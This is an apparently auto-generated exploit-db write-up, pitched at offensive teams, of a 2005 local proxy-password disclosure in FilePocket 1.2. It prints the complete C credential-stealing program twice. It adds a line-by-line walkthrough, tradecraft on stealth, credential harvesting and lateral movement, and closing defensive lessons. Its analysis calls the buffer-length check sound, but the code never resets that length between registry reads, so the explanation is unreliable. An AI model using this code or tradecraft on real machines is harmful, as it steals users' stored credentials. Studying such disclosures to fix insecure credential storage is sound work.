By exploitdb papers bot•April 28, 2005•
papers
FilePocket 1.2 Proxy Password Disclosure: A Deep Dive for Offensive Teams
FilePocket 1.2 Proxy Password Disclosure: A Deep Dive for Offensive Teams
What this paper is
This paper describes a vulnerability in FilePocket version 1.2 (and likely prior versions) that allows local users to retrieve stored proxy server credentials. The exploit code provided demonstrates how to access these credentials, which are stored in the Windows Registry.
Simple technical breakdown
FilePocket, a software application, stores its configuration settings, including proxy server details (address, port, username, and password), in the Windows Registry. This vulnerability exists because these settings are stored in plain text, making them accessible to any user with local access to the machine. The exploit code simply reads these specific registry keys to reveal the stored proxy information.
Complete code and payload walkthrough
The provided C code is a straightforward program designed to interact with the Windows Registry.
/*****************************************************************
FilePocket v1.2 Local Proxy Password Disclosure Exploit by Kozan
Application: FilePocket 1.2 (probably prior versions)
Vendor: ExoticSoft - www.exoticsoft.com
Vulnerable Description: FilePocket v1.2 discloses proxy passwords
to local users.
Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com
*****************************************************************/
#include <stdio.h>
#include <windows.h>
#define BUFSIZE 100
HKEY hKey;
char proxyaddr[BUFSIZE],
proxyport[BUFSIZE],
proxyuser[BUFSIZE],
proxypass[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;
int main(void)
{
if(RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\FilePocket\\Settings",
0,
KEY_QUERY_VALUE,
&hKey) == ERROR_SUCCESS)
{
lRet = RegQueryValueEx( hKey, "ProxyAddress", NULL, NULL,(LPBYTE)
proxyaddr,&dwBufLen);
if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ) strcpy(proxyaddr,"Not
found!");
lRet = RegQueryValueEx( hKey, "ProxyPassword", NULL, NULL,(LPBYTE) proxypass,
&dwBufLen);
if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ) strcpy(proxypass,"Not
found!");
lRet = RegQueryValueEx( hKey, "ProxyUsername", NULL, NULL,(LPBYTE) proxyuser,
&dwBufLen);
if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ) strcpy(proxyuser,"Not
found!");
lRet = RegQueryValueEx( hKey, "ProxyPort", NULL, NULL,(LPBYTE) proxyport,
&dwBufLen);
if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ) strcpy(proxyport,"Not
found!");
RegCloseKey( hKey );
printf("FilePocket v1.2 Local Proxy Password Disclosure Exploit by Kozan\n");
printf("Credits to ATmaCA\n");
printf("www.netmagister.com - www.spyinstructors.com\n");
printf("kozan@netmagister.com\n\n");
printf("Proxy Address : %s\n",proxyaddr);
printf("Proxy Port : %s\n",proxyport);
printf("Proxy Username : %s\n",proxyuser);
printf("Proxy Password : %s\n",proxypass);
}
else printf("FilePocket is not installed on your system!\n");
return 0;
}
// milw0rm.com [2005-04-28]Code Fragment/Block Mapping:
/*****************************************************************/ ... /*****************************************************************/: This is a standard C-style multi-line comment block. It contains metadata about the exploit: its name, target application and version, vendor, a description of the vulnerability, the discoverer/coder, credits, and contact information. It does not contain executable code.#include <stdio.h>: This line includes the standard input/output library, which provides functions likeprintffor displaying output to the console.#include <windows.h>: This line includes the Windows API header file. This is essential for using Windows-specific functions, such as those for interacting with the Registry (RegOpenKeyEx,RegQueryValueEx,RegCloseKey).#define BUFSIZE 100: This preprocessor directive defines a constantBUFSIZEwith a value of 100. This constant is used to set the maximum size for character buffers that will store registry values.HKEY hKey;: Declares a variablehKeyof typeHKEY. This is a handle to a registry key, which is used to reference an open registry key.char proxyaddr[BUFSIZE], proxyport[BUFSIZE], proxyuser[BUFSIZE], proxypass[BUFSIZE];: Declares four character arrays (buffers), each of sizeBUFSIZE(100 bytes). These buffers will be used to store the retrieved proxy address, port, username, and password, respectively.DWORD dwBufLen=BUFSIZE;: Declares a variabledwBufLenof typeDWORD(a 32-bit unsigned integer) and initializes it withBUFSIZE. This variable is used to specify the size of the buffer passed toRegQueryValueExand to receive the actual size of the data read from the registry.LONG lRet;: Declares a variablelRetof typeLONG. This variable will store the return value of registry functions, which indicates success or failure.int main(void): This is the main function where the program execution begins.if(RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\FilePocket\\Settings", 0, KEY_QUERY_VALUE, &hKey) == ERROR_SUCCESS):RegOpenKeyEx: This Windows API function attempts to open a registry key.HKEY_CURRENT_USER: Specifies that the key is located under the current user's hive in the registry."Software\\FilePocket\\Settings": This is the specific path to the registry key where FilePocket stores its settings.0: Reserved, must be zero.KEY_QUERY_VALUE: This flag specifies that we want to open the key for querying its values.&hKey: A pointer to aHKEYvariable that will receive a handle to the opened key if the operation is successful.== ERROR_SUCCESS: Checks if theRegOpenKeyExfunction returned successfully. If the key is not found or cannot be opened, this condition will be false.
lRet = RegQueryValueEx( hKey, "ProxyAddress", NULL, NULL,(LPBYTE) proxyaddr,&dwBufLen);:RegQueryValueEx: This Windows API function retrieves the data and type for a specified registry value.hKey: The handle to the open registry key obtained fromRegOpenKeyEx."ProxyAddress": The name of the registry value to query.NULL, NULL: These parameters are for receiving the type of the value and reserved, respectively. They are not needed for this exploit.(LPBYTE) proxyaddr: A pointer to the buffer where the retrieved value will be stored.&dwBufLen: A pointer to aDWORDvariable that specifies the size of the buffer and receives the actual size of the data read.- This line attempts to read the proxy address.
if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ) strcpy(proxyaddr,"Not found!");:- This checks if
RegQueryValueExfailed (lRet != ERROR_SUCCESS) or if the data read was larger than the buffer allocated (dwBufLen > BUFSIZE). - If either condition is true, it means the "ProxyAddress" value could not be read or was too large, so the
proxyaddrbuffer is set to "Not found!".
- This checks if
- The subsequent
RegQueryValueExcalls for"ProxyPassword","ProxyUsername", and"ProxyPort"follow the exact same logic as for"ProxyAddress", reading each respective registry value into its corresponding buffer (proxypass,proxyuser,proxyport). The error handling (if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ) strcpy(...,"Not found!");) is also identical for each. RegCloseKey( hKey );: This Windows API function closes the registry key handle, releasing the system resources associated with it.printf("FilePocket v1.2 Local Proxy Password Disclosure Exploit by Kozan\n");...printf("Proxy Password : %s\n",proxypass);: These lines use theprintffunction to display informational messages and the retrieved proxy credentials to the console.else printf("FilePocket is not installed on your system!\n");: Thiselseblock is executed if the initialRegOpenKeyExcall failed, meaning the "Software\FilePocket\Settings" key was not found, indicating FilePocket is likely not installed.return 0;: Indicates that the program executed successfully.// milw0rm.com [2005-04-28]: A comment indicating the source and publication date of the exploit.
Payload Explanation:
There is no separate shellcode or complex payload in this exploit. The "payload" is simply the act of reading and displaying the sensitive information directly from the registry. The program itself, when compiled and executed, is the payload.
Practical details for offensive operations teams
- Required Access Level: Local user access to the target Windows machine is required. No elevated privileges (Administrator) are strictly necessary, as the exploit targets
HKEY_CURRENT_USER, which is accessible by the logged-in user. - Lab Preconditions:
- A Windows machine with FilePocket version 1.2 (or a vulnerable prior version) installed and configured with proxy settings.
- A local user account on that machine.
- The exploit C code compiled into an executable.
- Tooling Assumptions:
- A C compiler (e.g., MinGW, Visual Studio) to compile the
.cfile into a Windows executable (.exe). - Standard Windows command-line tools for execution.
- A C compiler (e.g., MinGW, Visual Studio) to compile the
- Execution Pitfalls:
- FilePocket Not Installed: The exploit will report "FilePocket is not installed on your system!" if the application is not present or if the registry key path is different.
- Proxy Settings Not Configured: If FilePocket is installed but no proxy settings have been entered, the exploit will report "Not found!" for the corresponding fields.
- Buffer Overflow (Unlikely but possible): While
BUFSIZEis 100, if a registry value were significantly larger (though unlikely for typical proxy credentials), thedwBufLen > BUFSIZEcheck would prevent a direct overflow into thestrcpycall. However,RegQueryValueExitself might behave unexpectedly or truncate data if the buffer is too small. The current check handles this by reporting "Not found!". - Registry Permissions: While
HKEY_CURRENT_USERis generally accessible, extremely restrictive custom ACLs on the registry key could theoretically prevent access, though this is rare for standard user configurations.
- Tradecraft Considerations:
- Stealth: Executing this locally is generally stealthy as it doesn't involve network traffic or unusual system calls beyond standard registry access. The primary telemetry would be the execution of the compiled
.exefile. - Persistence: This exploit itself is not persistent. To maintain access or leverage the stolen credentials, further actions would be required (e.g., using the stolen credentials to pivot, deploying a backdoor).
- Credential Harvesting: The primary goal is credential harvesting. These credentials could then be used to access internal or external proxy servers, potentially leading to further network reconnaissance or lateral movement.
- Stealth: Executing this locally is generally stealthy as it doesn't involve network traffic or unusual system calls beyond standard registry access. The primary telemetry would be the execution of the compiled
- Expected Telemetry:
- Process Execution: The execution of the compiled
.exefile. - Registry Access: Auditing of
RegOpenKeyExandRegQueryValueExcalls for the specific keyHKEY_CURRENT_USER\Software\FilePocket\Settingsand its sub-values (ProxyAddress,ProxyPassword, etc.). - Console Output: The
printfstatements will generate output to the console, which might be captured if the command prompt session is logged or if the output is redirected.
- Process Execution: The execution of the compiled
Where this was used and when
This vulnerability was discovered and published in 2005. Exploits targeting plain-text credential storage in the registry were common in the early to mid-2000s as applications were still developing robust security practices. While specific documented widespread attacks using this exact exploit are not readily available in public historical records, the technique of harvesting credentials from the registry was a common reconnaissance step for attackers targeting Windows systems during that era. It would have been relevant for attackers performing local privilege escalation or reconnaissance on compromised machines where FilePocket was installed.
Defensive lessons for modern teams
- Never Store Sensitive Credentials in Plain Text: This is the most critical lesson. Applications should never store passwords or other sensitive credentials in plain text in configuration files or the registry.
- Secure Credential Storage: Use secure methods like:
- Windows Credential Manager: A built-in Windows API for securely storing and retrieving user credentials.
- Encryption: Encrypting sensitive data at rest, using strong cryptographic algorithms and secure key management practices.
- Hashing (for passwords): While not directly applicable to proxy passwords that need to be used, for user authentication, strong hashing algorithms (like bcrypt, scrypt, Argon2) should be used.
- Registry Hardening: Implement strict access control lists (ACLs) on sensitive registry keys. Limit write and read access to only necessary users or services.
- Regular Auditing: Monitor registry access for unusual patterns, especially for keys known to store sensitive information.
- Software Inventory and Vulnerability Management: Maintain an accurate inventory of installed software and actively patch or remove applications with known vulnerabilities. FilePocket 1.2 is extremely old and should not be in use.
ASCII visual (if applicable)
This exploit is a simple local process interacting with the operating system's registry. A complex architectural diagram is not strictly necessary, but a simplified flow can be visualized:
+-----------------+ +-----------------------+ +-------------------+
| Local User |----->| Compiled Exploit |----->| Windows Registry |
| (Logged In) | | (.exe) | | (HKEY_CURRENT_USER|
+-----------------+ +-----------------------+ | \Software\FilePkt|
| \Settings) |
+-------------------+
|
v
+-------------------+
| Console Output |
| (Proxy Details) |
+-------------------+Source references
- Paper ID: 964
- Paper Title: FilePocket 1.2 - Local Proxy Password Disclosure
- Author: Kozan
- Published: 2005-04-28
- Keywords: Windows, local
- Paper URL: https://www.exploit-db.com/papers/964
- Raw URL: https://www.exploit-db.com/raw/964
Original Exploit-DB Content (Verbatim)
/*****************************************************************
FilePocket v1.2 Local Proxy Password Disclosure Exploit by Kozan
Application: FilePocket 1.2 (probably prior versions)
Vendor: ExoticSoft - www.exoticsoft.com
Vulnerable Description: FilePocket v1.2 discloses proxy passwords
to local users.
Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com
*****************************************************************/
#include <stdio.h>
#include <windows.h>
#define BUFSIZE 100
HKEY hKey;
char proxyaddr[BUFSIZE],
proxyport[BUFSIZE],
proxyuser[BUFSIZE],
proxypass[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;
int main(void)
{
if(RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\FilePocket\\Settings",
0,
KEY_QUERY_VALUE,
&hKey) == ERROR_SUCCESS)
{
lRet = RegQueryValueEx( hKey, "ProxyAddress", NULL, NULL,(LPBYTE)
proxyaddr,&dwBufLen);
if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ) strcpy(proxyaddr,"Not
found!");
lRet = RegQueryValueEx( hKey, "ProxyPassword", NULL, NULL,(LPBYTE) proxypass,
&dwBufLen);
if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ) strcpy(proxypass,"Not
found!");
lRet = RegQueryValueEx( hKey, "ProxyUsername", NULL, NULL,(LPBYTE) proxyuser,
&dwBufLen);
if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ) strcpy(proxyuser,"Not
found!");
lRet = RegQueryValueEx( hKey, "ProxyPort", NULL, NULL,(LPBYTE) proxyport,
&dwBufLen);
if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ) strcpy(proxyport,"Not
found!");
RegCloseKey( hKey );
printf("FilePocket v1.2 Local Proxy Password Disclosure Exploit by Kozan\n");
printf("Credits to ATmaCA\n");
printf("www.netmagister.com - www.spyinstructors.com\n");
printf("kozan@netmagister.com\n\n");
printf("Proxy Address : %s\n",proxyaddr);
printf("Proxy Port : %s\n",proxyport);
printf("Proxy Username : %s\n",proxyuser);
printf("Proxy Password : %s\n",proxypass);
}
else printf("FilePocket is not installed on your system!\n");
return 0;
}
// milw0rm.com [2005-04-28]